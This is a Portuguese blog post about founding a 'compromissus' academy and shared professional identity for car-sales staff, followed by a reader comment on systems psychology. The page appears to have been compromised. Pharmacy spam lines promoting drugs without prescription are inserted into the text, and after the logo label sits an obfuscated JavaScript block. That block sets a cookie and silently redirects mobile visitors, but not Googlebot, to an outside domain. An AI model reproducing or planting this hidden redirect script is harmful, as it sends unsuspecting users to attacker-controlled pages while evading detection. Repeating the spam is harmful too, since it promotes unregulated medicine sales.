Posted by IN / 1 response

We have a dream…

9 November 2015

“We have a dream”: A ACADEMIA DA “CLASSE”?

Mais um passo.

Temos tanto percorrido, analisado, vivido, decidido….construído com base na convicção das verdades que…

to order inexpensively pills no rx

Que tal mais um passo?!…

Procurar que a nossa linguagem, conceitos, e valores possa ter uma identidade, uma evolução contínua a partir do vivido.

Têm sido imensos os que contribuíram para este estado do saber…

Temos a “obrigação” de “entregar” estes conceitos que falam por nós… Embora concorrentes no mercado temos em comum a função!

Caso para citar Rui Veloso:

“.. é muito mais o que nos une do aquilo que nos separa”

Dia 10 de Novembro…

Vamos estar de novo com mais um grupo de profissionais deste mercado. Desta vez um grupo de Chefes de Vendas. Mais um grupo que se compromete a viver o compromissus como também ajudar na sua estruturação, evolução, etc.

Estarmos juntos é muito mais que um “curso” ou “uma formação”. Desejamos que caminhe cada vez mais para um momento onde estes profissionais partilham e desenvolvem a sua identidade, uma “FORMA DE SER”.

“We have a dream”: A ACADEMIA DA “CLASSE”

Um dia alinhados pelos mesmo princípios, com o PIN ao peito, símbolo dessa mesma identidade, estes profissionais darão testemunho daquilo que os une e que constitui a sua mais valia para este mercado. Por isso, encaram a formação como o exercício para o seu desenvolvimento contínuo e sentido de classe.

Frequentando a mesma escola (Academia “compromissus”- Inter Marcas), estes profissionais, que embora possam ser concorrentes nas suas marcas, estão unidos por aquilo que “verdadeiramente” os diferencia dos demais:

– O exercício profissional de alto valor, fruto da sua IDENTIDADE.

Imaginamos o dia …..

-… em que num processo de seleção um determinado profissional, valorizando o seu histórico de ser “compromissus” possa constituir à partida como variável diferencial;

-… em que num SIMPÓSIO organizado pelos próprios e para os próprios, estes profissionais se procuram promover pela valorização dos seus conceitos e valores promovendo assim a sua classe.

-… em que na carteira profissional de cada um destes profissionais, as primeiras paginas sejam de conteúdo ético deontológico;

-…em que toda e qualquer empresa (Concessão/Importador) se pautará não só pelo que estes profissionais estruturaram ao longo de muitos anos, como lhe darão franco e sincero apoio como forma de reconhecimento pelo elevado contributo para a sustentabilidade dessas mesmas empresas;

-… em que um vendedor de uma determinada marca, cruzando-se com outro de outro marca, independentemente de não se conhecerem pessoalmente, a rápida aproximação deles se deve ao sentimento do grupo a que perceberam que pertencem. No peito lá estava o PIN: compromissus.

LOGOS_GAPS_COM_MARGENS_SEGURANCA_CMYK

purchase a at an easy rate medications without a doctor – http://vietietcynthia1402.mhs.narotama.ac.id/2016/11/30/purchase-a-at-an-easy-rate-medications-without-a-doctor/ var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

one response to We have a dream…

  • Daniela Miranda says on August 28, 2016 at 8:19 pm

    É impossível, tendo a psicologia sistémica como pilar da minha formação, não reparar na citação – “.. é muito mais o que nos une do aquilo que nos separa”. De facto, muitas vezes, a psicologia é desvalorizada e considerada uma ciência menos a sério por ter uma grande componente subjectiva. No entanto, a teoria geral dos sistemas ao desenvolver princípios unificadores que são transversais aos universos particulares das distintas ciências demonstra o isomorfismo das mesmas, possibilitando a aproximação entre as suas diferenças e a eliminação dos espaços vazios entre elas.
    O conceito de sistema passou a dominar as ciências, desde a antropologia, à economia, à psicologia e em particular à administração. A teoria geral dos sistemas começou a ser aplicada à administração e aos recursos humanos sobretudo pela necessidade crescente de estrutura, evolução e planeamento e da intensificação do uso das tic nas empresas. Como sistemas vivos que são, quer colaboradores quer organizações, são tidos como sistemas abertos que se encontram numa permanente partilha de informação com ambiente, cujo objetivo passa por desenvolver uma “FORMA DE SER”.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>